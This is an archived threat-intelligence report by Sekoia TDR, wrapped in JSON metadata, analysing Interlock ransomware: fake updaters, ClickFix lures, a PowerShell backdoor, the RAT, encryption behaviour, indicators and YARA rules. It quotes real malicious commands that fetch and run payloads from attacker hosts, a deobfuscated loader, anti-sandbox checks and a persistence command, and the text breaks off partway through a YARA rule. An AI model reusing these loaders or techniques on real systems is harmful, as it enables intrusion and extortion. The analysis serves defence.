{
	"id": "de2f8752-86c8-4c9c-97e7-301d68fe7307",
	"created_at": "2026-04-06T00:18:12.383554Z",
	"updated_at": "2026-04-10T03:30:50.46505Z",
	"deleted_at": null,
	"sha1_hash": "b139c9201b7bf2c2aec96a7660254f37e035ae9a",
	"title": "Interlock ransomware evolving under the radar",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1090933,
	"plain_text": "Interlock ransomware evolving under the radar\r\nBy Sekoia TDR\r\nPublished: 2025-04-16 · Archived: 2026-04-05 14:22:50 UTC\r\nIntroduction\r\nInterlock is a ransomware intrusion set first observed in September 2024 that conducts Big Game Hunting and\r\ndouble extortion campaigns. Interlock cannot be classified as a “Ransomware-as-a-Service” (RaaS) group, as no\r\nadvertisements for recruiting affiliates or information about affiliates have been found as of March 2025. As many\r\nother ransomware groups, Interlock has a Data Leak Site (DLS) called “Worldwide Secrets Blog” exposing\r\nvictim’s data, and providing a way to negotiate the ransom price to the victims. \r\nAlthough Interlock operators continue to regularly claim new victims on their DLS, they have published fewer\r\nnames —  24 victims since September 2024, including 6 in 2025 —  compared to the most active ransomware\r\ngroups currently operating. Indeed, ransomware such as Clop, RansomHub, Akira, Babuk, Lynx, Qilin, and Fog,\r\neach claimed more than one hundred victims in the first quarter of 2025. The companies impacted by the Interlock\r\nransomware span various sectors across North America and Europe, indicating that the target selection is primarily\r\nopportunistic.\r\nInterlock employs a multi-stage attack chain, starting by compromising legitimate websites that deliver fake\r\nbrowser updates, such as Google Chrome or MS Edge installers. These fake installers execute a PowerShell\r\nbackdoor facilitating the execution of multiple tools, and ultimately leading to the ransomware payload delivery.\r\nSince the apparition of the Interlock ransomware, Sekoia Threat Detection \u0026 Research (TDR) team observed its\r\noperators evolving, improving their toolset, and leveraging new techniques such as ClickFix to deploy the\r\nransomware payload. They also used new tools such as LummaStealer and BerserkStealer. 
This report describes\r\nthe malware and techniques used by Interlock operators and updates what is known about this threat since the\r\nTalos report of November 2024.\r\nFake updaters for initial access\r\nSince the emergence of the Interlock ransomware, its operators have been observed using fake updaters hosted on\r\ncompromised websites to deceive victims into downloading and executing the payload themselves. These\r\ninstallers are, in fact, PyInstaller files designed to mislead users. When the fake updater is manually launched by\r\nthe victim, it downloads and executes a legitimate installer file matching the impersonated product (a legitimate\r\nGoogle Chrome installer or MS Edge installer), while also running an embedded PowerShell script, which\r\nfunctions as a simple first-stage backdoor.\r\nThis PowerShell script operates in an infinite loop, continuously executing HTTP requests to specified hosts, with\r\nfailover logic between domain names and IP addresses in case of errors. It gathers system information,\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 1 of 24\n\ncommunicates with remote hosts, downloads and executes files, and, in recent versions, offers functionality for\r\nexecuting arbitrary commands and establishing persistence.\r\nAt launch, the script verifies whether it has been executed with specific arguments. If only a single argument is\r\nprovided, it relaunches itself with an additional argument ‘1’ to ensure the script runs detached, without\r\na visible window.\r\nThe system information is collected using various PowerShell commands. 
The following information is\r\ncollected:\r\nThe version of the script, which is stored in a constant;\r\nUser context (SYSTEM, Admin or User privileges) using\r\n[Security.Principal.WindowsIdentity]::GetCurrent();\r\nSystem information via systeminfo;\r\nProcesses and services via tasklist /svc;\r\nActive services via Get-Service;\r\nAvailable drives via Get-PSDrive;\r\nARP table via arp -a.\r\nAfter collecting system information, the script applies an XOR operation to the data using a hardcoded key, then\r\ncompresses it with the Gzip algorithm and prefixes the final buffer with a fixed 32-bit integer.\r\nThe formatted system information is sent to the Command-and-Control (C2) server using an HTTP POST request\r\non the /init1234 URL path. The server can then respond with “ooff”, which is the terminate command.\r\nThe C2 server can also send a .exe or .dll file (the type is determined by the last byte of the response). The file is\r\ndecoded using XOR and saved in a randomly named folder within %AppData%. It is then executed directly in the\r\ncase of a .exe file, or via rundll32 in the case of a .dll. Unfortunately, the TDR team was not able to retrieve the\r\npayload returned by the C2 server, but multiple files corresponding to the expected response were observed. These\r\nfiles are described further below.\r\nMultiple versions of this PowerShell RAT were observed, from version 1 to version 11. Later versions of the script\r\nimplement an atst command to establish persistence by creating a\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key to relaunch itself at startup. 
This version\r\n(V11) is also able to retrieve and execute a Windows command from the C2.\r\nIn one of the most recently observed PowerShell backdoors, the requested domains are the following:\r\nsublime-forecasts-pale-scored.trycloudflare[.]com\r\nwashing-cartridges-watts-flags.trycloudflare[.]com\r\ninvestigators-boxing-trademark-threatened.trycloudflare[.]com\r\nfotos-phillips-princess-baker.trycloudflare[.]com\r\ncasting-advisors-older-invitations.trycloudflare[.]com\r\ncomplement-parliamentary-chairs-hc.trycloudflare[.]com\r\nC2 domains used by the PowerShell backdoor v7-v9\r\nAll observed domains are subdomains of trycloudflare.com, a legitimate Cloudflare service. TryCloudflare\r\nenables the creation of tunnels to test applications locally without permanently exposing them to the Internet. By\r\nquerying trycloudflare.com domains for a response on the /init1234 path, multiple other domains used in similar\r\ncases were identified.\r\nThe PowerShell script used the following IP addresses as a backup:\r\n216.245.184[.]181 AS399629 (BLNWX)\r\n212.237.217[.]182 AS57043 (Hostkey B.v.)\r\n168.119.96[.]41 AS24940 (Hetzner Online GmbH)\r\nBackup IP addresses used by the PowerShell backdoor v7-v9\r\nIn all observed samples, the PowerShell backdoor has hard-coded backup IP addresses. Eight different clusters of\r\nIP addresses have been observed since the beginning of Interlock’s activity. The domains and IP addresses discovered\r\nduring the investigation are listed in the Indicators section.\r\nThe composition of these clusters is noteworthy. In nearly every cluster, one of the IP addresses belongs to the\r\nBLNWX AS (BitLaunch), a VPS provider that accepts cryptocurrency payments, another to the\r\nHetzner Online GmbH AS, and the third originates from a different AS each time. 
This distribution of IP address\r\norigins may be an effort to make the C2 infrastructure more resilient to takedown.\r\nIn January 2025, the Sekoia TDR team observed a change in the Interlock fake updater. It shifted from a fake browser\r\nupdater to an updater impersonating security software, with file names such as:\r\nFortiClient.exe\r\nIvanti-Secure-Access-Client.exe\r\nGlobalProtect.exe\r\nWebex.exe\r\nAnyConnectVPN.exe\r\nCisco-Secure-Client.exe\r\nzyzoom_antimalware.exe\r\nThis new fake updater uses PyInstaller and drops the DLL python313.dll to execute itself. It ends up executing the\r\nsame PowerShell backdoor.\r\nAdoption of the ClickFix technique for initial access\r\nOn 9 January 2025, TDR observed a ClickFix killchain delivering a fake installer payload, which was associated\r\nwith Interlock. ClickFix is a social engineering technique where threat actors manipulate users into executing\r\nmalicious commands by presenting fake system prompts or CAPTCHA verifications. These prompts guide victims\r\nto manually copy and paste malicious PowerShell commands, bypassing automated security measures and leading\r\nto malware deployment or system compromise.\r\nFigure 1. Fake Cloudflare CAPTCHA asking users to execute a command to access a website\r\nThis specific ClickFix page was observed on four different URLs, but only the one masquerading as Advanced\r\nIP Scanner seems to deliver a fake installer; the others execute the PowerShell backdoor via an obfuscated\r\nloader.\r\nhttps://microsoft-msteams[.]com/additional-check.html\r\nhttps://microstteams[.]com/additional-check.html\r\nhttps://ecologilives[.]com/additional-check.html\r\nhttps://advanceipscaner[.]com/additional-check.html\r\nThe website asks the user to open a console with the shortcut “Windows + R” and to paste, with CTRL + V, the command\r\nthat was silently copied into the victim’s clipboard. 
Then the victim is guided to press “Enter” to\r\nexecute the command.\r\nCase 1 — PyInstaller ⇒ PowerShell backdoor\r\nWhen the “Fix it” button is clicked, the clipboard is filled with the following command:\r\ncmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command \"$path='c:\\\\users\\\\public\\\\win31.exe';iwr\r\nThis command downloads the payload from the hxxp://topsportracing[.]com/wp-25 URL, which seems to be a\r\ncompromised website, and opens a browser window to the legitimate website https://www.advanced-ip-scanner.com/ to make the user believe that the command allowed them to access the Advanced IP Scanner website and\r\nnot arouse any suspicion.\r\nThe downloaded payload is a 36 MB PyInstaller file, which is a sample of the fake updater described above.\r\nCase 2 — Obfuscated PowerShell loader ⇒ PowerShell backdoor\r\nThe command is an obfuscated PowerShell loader which downloads a legitimate Node.js executable from\r\nhttps://nodejs.org/dist/v22.11.0/node-v22.11.0-win-x64.zip and executes the PowerShell backdoor, which is double\r\nbase64-encoded. 
This legitimate executable is then used to run the malicious payload.\r\ncmd /c start /min powershell -w H -c \"$response = Invoke-WebRequest -Uri \\\"64.95.10[.]95:8080/misteams\\\" ; Invo\r\nA deobfuscated version of this loader could be the following:\r\n$legitimate_nodejs_url = \"https://nodejs.org/dist/v22.11.0/node-v22.11.0-win-x64.zip\"\r\n$appdata_path = \"C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\"\r\n$download_path = \"C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\downloaded.zip\"\r\ntry {\r\n$web_client = New-Object System.Net.WebClient\r\n$web_client.DownloadFile($legitimate_nodejs_url, $download_path)\r\n} catch {\r\nexit 1\r\n}\r\nif (-not (Test-Path -Path $appdata_path)) {\r\nni -Path $appdata_path -ItemType Directory | Out-Null\r\n}\r\ntry {\r\n$shell_app = New-Object -ComObject Shell.Application\r\n$namespace_download = $shell_app.NameSpace($download_path)\r\n$namespace_appdata = $shell_app.NameSpace($appdata_path)\r\n$namespace_appdata.CopyHere($namespace_download.Items(), 4 + 16)\r\n} catch {\r\nexit 1\r\n}\r\n$appdata_path = \"C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\node-v22.11.0-win-x64\"\r\n$alphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789\"\r\n$random_str = -join ((1..8) | % { $alphabet[(Get-Random -Minimum 0 -Maximum $alphabet.Length)] })\r\n$log_file_path = \"C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\node-v22.11.0-win-x64\\\u003crandom_str\u003e.log\"\r\n$b64_payload = \"\u003cbase64 encoded payload\u003e\"\r\n$payload = [Convert]::FromBase64String($b64_payload)\r\n[System.IO.File]::WriteAllBytes($log_file_path, $payload)\r\n$nodejs_exe_path = \"C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\node-v22.11.0-win-x64\\node.exe\"\r\nsaps -FilePath $ExecutionContext.InvokeCommand.$nodejs_exe_path -ArgumentList $ExecutionContext.InvokeCommand.$l\r\nIn February 2025, this loader was 
improved with some interesting execution guardrails:\r\nThe system manufacturer is not “QEMU”;\r\nThe total physical memory is at least 4 GB or the used physical memory is at least 1.5 GB;\r\nThe computer name is not “DESKTOP-\\S”;\r\n$manufacturer = gwmi Win32_ComputerSystem | select -ExpandProperty Manufacturer\r\nif ($manufacturer -eq \"QEMU\") {\r\nexit 0;\r\n}\r\n$total_physical_memory = (Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory / 1GB\r\n$free_physical_memory = (Get-CimInstance Win32_OperatingSystem).FreePhysicalMemory / 1MB\r\n$used_physical_memory = $total_physical_memory - $free_physical_memory\r\nif ($total_physical_memory -lt 4 -or $used_physical_memory -lt 1.5) {\r\nexit 0\r\n}\r\nif ($env:computername -match \"DESKTOP-\\S\") {\r\nexit 0\r\n}\r\nThese execution guardrails are anti-sandbox conditions, as QEMU is widely used in malware analysis and sandbox\r\nenvironments. Checking the memory size is a common method of VM detection, as sandboxes are often created\r\nwith the minimum possible amount of resources.\r\nTDR continues to closely watch this ClickFix infrastructure. However, it appears to be unused since February 2025.\r\nIt is possible that this technique was less effective than the Interlock operators had anticipated, leading them to\r\nabandon its use.\r\nDelivered payload\r\nThe Sekoia TDR team did not observe the PowerShell backdoor downloading or executing any payload, as most of the\r\nactive C2 servers responded ooff, the PowerShell backdoor’s shutdown command, during our investigation.\r\nAccording to the first analysis conducted by Cisco Talos in November 2024, the observed delivered\r\npayloads are a credential stealer and a keylogger. This is consistent with the files related to Interlock activity\r\nobserved ever since. 
\r\nThe custom packer used by the Interlock intrusion set to protect all files related to their attacks allowed TDR to pivot\r\nand track their different tools. The executables packed with this custom packer were indeed files related to\r\nkeylogging and information stealing.\r\nTDR also observed the Interlock operators using different known families of credential stealers, such as\r\nLummaStealer in February 2025 and BerserkStealer in January 2025. All these malware families were packed\r\nusing the Interlock custom packer.\r\nAs with the ClickFix technique, the observed usage of these two malware families is limited in time, which possibly\r\nindicates that the Interlock operators are testing and/or deploying new tools.\r\nHowever, the most frequently observed file during our investigation is the Interlock RAT, described in the\r\nfollowing section.\r\nInterlock RAT\r\nIn the payloads related to Interlock activity, TDR observed a backdoor used by Interlock since at least October\r\n2024. 
This malware is a RAT, delivered as a packed DLL of ~1.3 MB, whose unpacked version is only ~180 KB.\r\nThis RAT implements the following commands:\r\n1 Ping back and re-create the socket\r\n2 Read data from the TCP connection\r\n3 Download a file from the C2 and save it on disk\r\n4 Do nothing\r\n5 Run rundll32.exe %temp%\\tmp[random int].dll run %temp%\\tmp[random int].dll and exit. The executed DLL file is an embedded DLL used to remove itself.\r\n6 Write a log file in %temp%\\[random int].log (which seems to be a config file containing the C2 IP addresses)\r\n7 Update the C2 list\r\n8 Close each connection and each opened file\r\n9 Execute a cmd.exe\r\n30/06/2025 Update: Following feedback from an external reviewer, it was brought to our attention that our initi\r\nAdditional information:\r\n - Command 3 uses WriteFile not to download files, but to redirect the created pipe in order to weaponize it\r\n - Command 5 executes an embedded DLL to remove itself from the victim machine and consequently remain steal\r\nThis RAT has three hard-coded IP addresses, which correspond to the observed clusters, and the malware\r\ncommunicates with its C2 over a raw TCP socket on port 443. 
The data downloaded from the C2 servers is\r\ndecrypted using a custom XOR-based function.\r\nThe backdoor sends the following information to the C2 server, preceded by the magic number 55 11 69 DF\r\n(0xDF691155).\r\n{\"iptarget\": \"96.62.214[.]11\", \"domain\": \"WORKGROUP\", \"pcname\": \"SIRIUSWIN11MRE\", \"runas\": 1, \"typef\": 2, \"vero\r\niptarget: C2 IP address;\r\nrunas: boolean indicating whether the sample is executed with admin privileges;\r\ntypef: hardcoded value;\r\nveros: OS version of the infected system;\r\ndomain: the Active Directory domain to which the host is joined, or “WORKGROUP” if none.\r\nLateral movement and exfiltration\r\nAccording to Talos Incident Response, the Interlock operators primarily use RDP and stolen credentials to move\r\nbetween systems. Additionally, they observed commands used for pre-kerberoasting reconnaissance. Like many\r\nother ransomware groups, they aim to gain access to the victim’s domain controller (DC). Domain controllers are\r\ncritical because they host Active Directory Domain Services (AD DS), which manage authentication,\r\nauthorisation, and resource access across the network. By compromising the domain controller, attackers gain\r\ncontrol over the entire domain, allowing them to escalate privileges, disable security mechanisms, and propagate\r\ntheir ransomware payload across all connected systems.\r\nThe operators also use PuTTY, AnyDesk and possibly LogMeIn to maintain remote access. PuTTY is likely used\r\nto access Linux systems, as Interlock ransomware has a version able to target them.\r\nFurthermore, Talos reports that Interlock operators use Azure Storage Explorer and the AzCopy tool to exfiltrate\r\nsensitive data to an attacker-controlled Azure storage blob. This information could not be confirmed by our\r\nobservations.\r\nWhen the Interlock operators succeed in exfiltrating sensitive data from a company’s network, they upload it\r\nto a new TOR domain. 
The link to this TOR domain is provided in each post dedicated to a new victim on their\r\nDLS.\r\nFigure 2. Screenshot of Interlock’s DLS\r\nThe Interlock ransomware exists in multiple versions, with variants compiled to target both Windows and Linux\r\noperating systems. Since November 2024, multiple Windows variants have been identified, although no Linux\r\nvariant has been observed since October 2024. The Linux version of the ransomware closely mirrors the Windows\r\none, with the same expected arguments.\r\nAs with the other malware used in Interlock attacks, the Windows version of the ransomware is developed in\r\nC/C++. The executable is protected by a custom packer and unpacked using code stored in its Thread Local\r\nStorage. The Windows variant uses AES-CBC encryption provided by the LibTomCrypt library. After the\r\nunpacking phase, it enumerates logical drives from the letter A to Z (excluding the C drive), then iterates over\r\nfolders and files in these drives, encrypting files with specific extensions while excluding folders such as\r\n$Recycle.Bin and PerfLogs, and system-critical files such as .dll or .exe. The names of encrypted files are modified\r\nwith the extension .interlock in the earlier version, and .!NT3R10CK in the more recent samples observed.\r\nAfter encryption, the ransomware creates a ransom note file in each folder. The file name has evolved over time,\r\nstarting from !__README__!.txt to FIRST_READ_ME.txt and _QUICK_GUIDE_.txt.\r\nThe Windows variant of the ransomware creates a scheduled task to be executed every day at 8:00 PM. 
\r\nschtasks /create /sc DAILY /tn \"TaskSystem\" /tr \"cmd /C cd %s \u0026\u0026 %s\" /st 20:00 /ru system \u003e nul\r\nThe Windows variants accept the following commands:\r\n-d --directory: target only the directory passed in argument\r\n-f --file: target only the file passed in argument\r\n-del --delete: the ransomware deletes itself after encryption. To do so, it drops a small DLL file (2.5 KB)\r\nstored in its data section and executes it using rundll32.exe.\r\n-s --system: create a scheduled task\r\n--release-files: unknown purpose\r\nSince October 2024, the file extensions ignored by the ransomware have remained unchanged.\r\nWindows variant: .bat, .bin, .cab, .cmd, .com, .cur, .diagcab, .diagcfg, .diagpkg, .drv, .hlp, .hta, .ico, .msi, .ocx, .psm1, .src, .sys, .ini, .url, .dll, .exe, .ps1\r\nLinux variant: .b00, .v00, .v01, .v02, .v03, .v04, .v05, .v06, .v07, .t00\r\nRansom note\r\nThe ransom note has evolved slightly since the beginning of Interlock’s activity. Talos observed a similarity\r\nbetween the note dropped by Interlock ransomware and the one dropped by Rhysida ransomware, but could not\r\nconclude that the two actors are linked. TDR notes that the group is placing increasing emphasis on the legal\r\nrisks faced by companies, citing the laws that would be violated if the data leak were to be disclosed by Interlock.\r\nTwo different versions of the ransom note, observed on 11 October 2024 and 21 February 2025, are provided in the\r\nAppendix.\r\nConclusion\r\nThe Interlock ransomware group, active since September 2024, is an evolving, increasingly significant threat,\r\nalthough not a particularly prolific one at present. Despite its relatively low victim count in Q1 2025, the group\r\nhas demonstrated adaptability and innovation in its tactics. 
In January and February 2025, Interlock experimented\r\nwith a new initial access method, dubbed ClickFix, showcasing its willingness to innovate. Its reliance on\r\ncredential-stealing malware such as LummaStealer and BerserkStealer, alongside keyloggers, underscores a\r\npersistent focus on harvesting sensitive data for lateral movement and privilege escalation.\r\nInterlock’s technical arsenal has remained largely consistent since its inception, relying on a specific PowerShell\r\nbackdoor, a Remote Access Trojan and a ransomware payload. However, incremental enhancements to its toolset\r\nhave been observed, including the evolution of its PowerShell backdoor to version 11 and modifications to its\r\nransom note, which now emphasises legal repercussions for non-payment.\r\nInterlock continues to improve its tools and methods, which reflects a willingness to maintain relevance while\r\navoiding the large-scale visibility associated with more prolific ransomware groups such as the attention-seeking\r\nFunkSec ransomware group. 
TDR continues monitoring Interlock activities to anticipate further evolution and\r\npotential escalation in their campaigns.\r\nIndicators of Compromise and technical details\r\nIndicators of Compromise\r\nHost\r\nFake Updater\r\n576d07cc8919c68914bf08663e0afd00d9f9fbf5263b5cccbded5d373905a296\r\nf962e15c6efebb3c29fe399bb168066042b616affddd83f72570c979184ec55c\r\n09793a85d372f044fe53c4b47c47049c6bc13d1141334727800b2e32e6d92342\r\ndee5915b76dd3bae3d3cedc0c1d1b055daab5852cba4868c92eb88b9a84a0b00\r\n5627457a12c562b7a08f634878758d268b9fde44ce35292e887ca13741c5f942\r\n3a560ca66f61ba5dceb6016703e0346ff8fe1144bd356a40f740149a2a878fe5\r\nf6c7ecff7b07cba12bd79833a23d12d5fcd12a75a3394d923b994ba0ed535db3\r\n7890b116d13a52efe696ce1e2c0ed83029775cf4bea836ce551e71d222ee116f\r\ne668e30b4e111e16b4017cd49dd90c39f9988f8a44cd9cc16b95b7b451862b74\r\nbe6e5cede4e6a8b807062db211eb3e8825a6cc00d71ddf7bcd63971d76219a25\r\n05c99f2c1a218ce4a985fd03a3a510c2eaf08ef4772f93ef4f2d5da6cd9b86a1\r\n25a1d86248b7cf5f870dbc9960ce336266473bd40be3a8dcb35e6be88c9df261\r\n2f03b5d1081dfde3d1296dace404b362188b4a941530746d7b14711b42bc53ad\r\nb36c20c757c4780f89272ce224a29a5a61b62733367893574196debde19383fe\r\nd1cd8c4574c3290ae16bf4e718c5e89dadef5b2fd4eea2211a19a6180ff8ee5b\r\neaca86a3f397d10d9188be9fcd2af1a7a30a9b573b2282b0b8300efeb5ff1efd\r\nf1df43fe0f95de6badfb710827cdc7272e6654f108ef2cfcb2a01aca089f0624\r\nClickFix PowerShell 
Loaders\r\n5c697162527a468a52c9e7b7dc3257dae4ae5142db62257753969d47f1db533e\r\neb587b2603dfc14b420865bb862fc905cb85fe7b4b5a781a19929fc2da88eb34\r\n958ff93e92ee8bed7819555603ea612f263c1b9c673566f5c506288b5318eff8\r\n91fcf70c1775dcaaaa4d3de17d87d67976b0cec9939dedfb86f093ab388ed3b0\r\ne69491a61ebc4a9ffc17884063c69a5489a83dd6d71295b4216962a43242a6c8\r\n04bae0045b86456d6000378a2e37d58b1fa617101543ad23bcec862300b87be3\r\n71f773b4e9178dcedd402c94fb9384aea6312d8a93f95f3f9dc1249fd4933658\r\n888842bc1f6fcb354431919080858c623def305bed2214f11b93591859d4dee2\r\n045c041354a6d6b47e91e1124a7dc77397c18e0695ccbc73f87b12a0a1079d46\r\n6e4ca569ab809ba3545860d26180316366803c231a2e3a66b4906adc5826a397\r\n074d26b9b128be8e4a77d73dcac31307f28b0e8b8097622c02267be349fe4b4f\r\na760e28145620fccd072a415031cec4036fc09e8530c93d85f5d1509d62fe551\r\n62971070d6a8b9fca8a50b9cd8e91545bfcc2c2b6665f134c112081f54e6bf31\r\n17db9d121fb3eb5033307fdb53df67402bcbc9d8970f45d8142b78c83769b7af\r\n60af8899b49013e9deb1d5cac58562d7ed12bfda1187627e9d25714b26218f0d\r\nfdd4e0bb2a4475e4e44154d7bf29490de98496553af3c8807f999ab8b920263f\r\n7d9f3701bf6f43ab84ce02ce4915dc0703504263db2e1eb65f4f7c791565f731\r\nf613966b6ed1f080aacba005b1e48268ef662fffdf9894382299645f42900848\r\ne307d3e9b8de59311c692b2ab0ee864f0d469066e041141d577b65b43a4b3ffa\r\n351b8a0081fd9f5c35497f5183fb14aef73c1af75628ae689c9218689db01cd9\r\n7501623230eef2f6125dcf5b5d867991bdf333d878706d77c1690b632195c3ff\r\n31f49c74046cc61bf102f3b9f2ce06471b0372d794139325e71c2dacca7bd00a\r\nInterlock 
RAT\r\n1105a3050e6c842fb9411d4f21fd6fdb119861c15f7743e244180a4e64b19b83\r\n299a8ef490076664675e3b52d6767bf89ddfa6accf291818c537a600a96290d2\r\n2faef6a1a0c00f8d44955c243df3c098f0fccd20c59677d274a43023002a4e90\r\n39539766ae8f5256e6f21d853b8b7ea8f003d29f6d7cd57d1ecb621dc2b97c89\r\n464ca510a465a38689bd61988b7d366a8fd7e26ca805850b3adb418e95307601\r\n61f8224108602eb1f74cb525731c9937c2ffd9a7654cb0257624507c0fdb5610\r\n68366ced818508de187167d8f9106be7801b8dcf1f03ae169459c7336d6e69de\r\n8251186b3196e3fefb0dbfcf71dfccc2c1cd66515686c9af8a6fb48766c739c6\r\n9031652af104aa207d6dad1c402db86c557323b2567c0cc93d022f01ae926e9a\r\n9e387f1564f9e38ba87dbafbde3731db2e844ff3800500d6707028bb065c070b\r\nb3a512b9f4705d1947fbbbc42accdbd6bd95af1b07cec09d75af501746fecdd5\r\nf02622129e7774b7673e2a9f62bb4a208d4a142b5d925532c7920481549bd07b\r\n61d092e5c7c8200377a8bd9c10288c2766186a11153dcaa04ae9d1200db7b1c5\r\nb35da0c1a515286a2b3021cf518140a59a63b470a9d611303304918be9354d68\r\nKeylogger\r\n5cbc2ae758043bb58664c28f32136e9cada50a8dc36c69670ddef0a3ef6757d8\r\ndf41085a8aa9ee9da6a03db08ad910b6ef5fcdc8fee7ebb19744331c5e70c782\r\nd4f3d0446e08dbf1a7ccb6da09e756ff75eae3b04dafe2c2a69d6919052d2ebf\r\nBerserkStealer\r\neb1cdf3118271d754cf0a1777652f83c3d11dc1f9a2b51e81e37602c43b47692\r\na5623b6a6f289bb328e4007385bdb1659407a9e825990a0faaef3625a2e782cf\r\nLummaStealer\r\n4672fe8b37b71be834825a2477d956e0f76f7d2016c194f1538139d21703fd6e\r\nWindows Interlock ransomware\r\n4a97599ff5823166112d9221d0e824af7896f6ca40cd3948ec129533787a3ea9\r\n33dc991e61ba714812aa536821b073e4274951a1e4a9bc68f71a802d034f4fb9\r\nb85586f95412bc69f3dceb0539f27c79c74e318b249554f0eace45f3f073c039\r\na26f0a2da63a838161a7d335aaa5e4b314a232acc15dcabdb6f6dbec63cda642\r\n0fff8fb05cee8dc4a4f7a8f23fa2d67571f360a3025b6d515f9ef37dfdb4e2ea\r\nSmall autoremove DLL used by the ransomware\r\nc9920e995fbc98cd3883ef4c4520300d5e82bab5d2a5c781e9e9fe694a43e82f\r\nLinux 
Interlock ransomware\r\n28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f\r\nNetwork\r\nData Leak Site\r\nhttp://ebhmkoohccl45qesdbvrjqtyro2hmhkmh6vkyfyjjzfllm3ix72aqaid[.]onion\r\nBackdoor C2\r\nCluster 1\r\n23.95.182[.]59\r\n195.201.21[.]34\r\n159.223.46[.]184\r\nCluster 2\r\n23.227.203[.]162\r\n65.109.226[.]176\r\n65.38.120[.]47\r\nCluster 3\r\n216.245.184[.]181\r\n212.237.217[.]182\r\n168.119.96[.]41\r\nCluster 4\r\n216.245.184[.]170\r\n65.108.80[.]58\r\n84.200.24[.]41\r\nCluster 5\r\n206.206.123[.]65\r\n49.12.102[.]206\r\n193.149.180[.]158\r\nCluster 6\r\n85.239.52[.]252\r\n5.252.177[.]228\r\n80.87.206[.]189\r\nCluster 7\r\n65.108.80[.]58\r\n212.104.133[.]72\r\n140.82.14[.]117\r\nCluster 8\r\n64.94.84[.]85\r\n49.12.69[.]80\r\n96.62.214[.]11\r\nCluster 9\r\n177.136.225[.]153\r\n188.34.195[.]44\r\n45.61.136[.]202\r\nCompromised URLs\r\nhttp://topsportracing[.]com/wp-az\r\nhttp://topsportracing[.]com/az10\r\nhttps://airbluefootgear[.]com/wp-includes/images/xits.php\r\nhttps://apple-online[.]shop/ChromeSetup.exe\r\nhttps://apple-online[.]shop/MSTeamsSetup.exe\r\nhttps://apple-online[.]shop/MicrosoftEdgeSetup.exe\r\nClickFix 
URLs\r\nhttps://microsoft-msteams[.]com/additional-check.html\r\nhttps://microstteams[.]com/additional-check.html\r\nhttps://advanceipscaner[.]com/additional-check.html\r\nhttps://ecologilives[.]com/additional-check.html\r\nhttp://162.55.47[.]21:8080/1742688720\r\nhttp://64.95.10[.]95:8080/misteams\r\nhttp://64.95.10[.]95:8080/recaptch\r\nhttp://45.61.136[.]228:8080/recaptha\r\nhttps://album-anthony-rn-submission[.]trycloudflare.com/25423565\r\nhttps://spa-step-hopkins-islands[.]trycloudflare.com/erfgtrtt\r\nhttps://metro-offset-imposed-behind[.]trycloudflare.com/ytjstast\r\nhttps://santa-reflection-capitol-classifieds[.]trycloudflare.com/12341234\r\nhttps://diff-beats-belize-chapter[.]trycloudflare.com/12341234\r\nhttps://phones-pichunter-businesses-drop[.]trycloudflare.com/12341234\r\nhttps://lcd-add-palace-switching[.]trycloudflare.com/12341234\r\nhttps://forest-offensive-height-letters[.]trycloudflare.com/12341234\r\nhttps://pub-motorola-viking-charger[.]trycloudflare.com/12341234\r\nhttps://dc-broader-green-norwegian[.]trycloudflare.com/12341234\r\nPowerShell backdoor C2 domains\r\nrefrigerator-cheers-indicator-ferrari[.]trycloudflare.com\r\nanalytical-russell-cincinnati-settings[.]trycloudflare.com\r\nbristol-weed-martin-know[.]trycloudflare.com\r\nspeak-head-somebody-stays[.]trycloudflare.com\r\nphoto-auction-visual-gains[.]trycloudflare.com\r\nsuffering-arnold-satisfaction-prior[.]trycloudflare.com\r\n
lancaster-sean-initial-ru[.]trycloudflare.com\r\ncasting-advisors-older-invitations[.]trycloudflare.com\r\nsublime-forecasts-pale-scored[.]trycloudflare.com\r\ninvestigators-boxing-trademark-threatened[.]trycloudflare.com\r\nfotos-phillips-princess-baker[.]trycloudflare.com\r\nwashing-cartridges-watts-flags[.]trycloudflare.com\r\ncomplement-parliamentary-chairs-hc[.]trycloudflare.com\r\nopen-exceptions-cleared-feelings[.]trycloudflare.com\r\nmedicine-podcasts-halo-expected[.]trycloudflare.com\r\nsecurities-variance-vocal-temporal[.]trycloudflare.com\r\nscientific-shown-desperate-ratio[.]trycloudflare.com\r\nviews-ethics-orientation-roommate[.]trycloudflare.com\r\npipe-hawaii-monkey-automatic[.]trycloudflare.com\r\ncalifornia-appeals-pilot-harper[.]trycloudflare.com\r\nuna-idol-ta-missile[.]trycloudflare.com\r\nmusicians-implied-less-model[.]trycloudflare.com\r\nstrain-brighton-focused-kw[.]trycloudflare.com\r\nmortgage-i-concrete-origins[.]trycloudflare.com\r\nwww.sublime-forecasts-pale-scored[.]trycloudflare.com\r\nYARA rules\r\nrule backdoor_win_interlock_powershell_backdoor {\r\nmeta:\r\n id = \"678827c2-9416-417b-98c3-6e22010bb541\"\r\n version = \"1.0\"\r\n malware = \"Interlock RAT\"\r\n description = \"Detect the Interlock PowerShell backdoor\"\r\n source = \"Sekoia.io\"\r\n creation_date = \"2025-03-24\"\r\n classification = \"TLP:GREEN\"\r\nstrings:\r\n $ = \"path: '/init1234'\" nocase\r\n $ = \"Get-PSDrive -PSProvider FileSystem\" nocase\r\n $ = \"[security.principal.windowsidentity]::getcurrent().name\" nocase\r\ncondition:\r\n all of them\r\n}\r\nimport \"pe\"\r\nimport \"hash\"\r\nrule crypter_win_InterLock_resources {\r\nmeta:\r\n id = \"9b9fdb90-4227-4bd1-a7a8-6b4cef71ee44\"\r\n version = \"1.0\"\r\n malware = \"InterLock\"\r\n intrusion_set = \"Interlock ransomware operators\"\r\n description = \"Detect resources used in every file tied to InterLock malware\"\r\n 
